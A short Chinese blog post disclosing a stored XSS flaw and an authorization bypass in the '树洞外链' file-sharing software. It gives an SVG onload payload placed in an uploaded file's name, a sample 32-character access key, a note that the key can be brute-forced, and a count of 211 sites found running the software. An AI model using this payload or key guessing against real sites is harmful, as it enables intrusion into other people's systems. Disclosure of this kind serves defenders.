你的微笑很美

树洞外链xss+越权漏洞

代码审计 小雨 174℃ 0评论

0x00:xss漏洞

上传一张图片,在创建文件名添加xss,公开是分享文件广场。

><svg/onload=alert(6)>

 

0x01:越权

(需要条件,可以爆破。32位随机字符)

需要key值。

c74bffaa1cd2a4eda30bd72fe5453bb0

 

0x02:结束语

爬了一下在用树洞外链的网站,一共有211个网站。

本文固定链接:小雨' s Blog » 树洞外链xss+越权漏洞
本站内容除特别标注外均为原创,欢迎转载,但请保留出处!

喜欢 (0)
发表我的评论
取消评论
表情

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址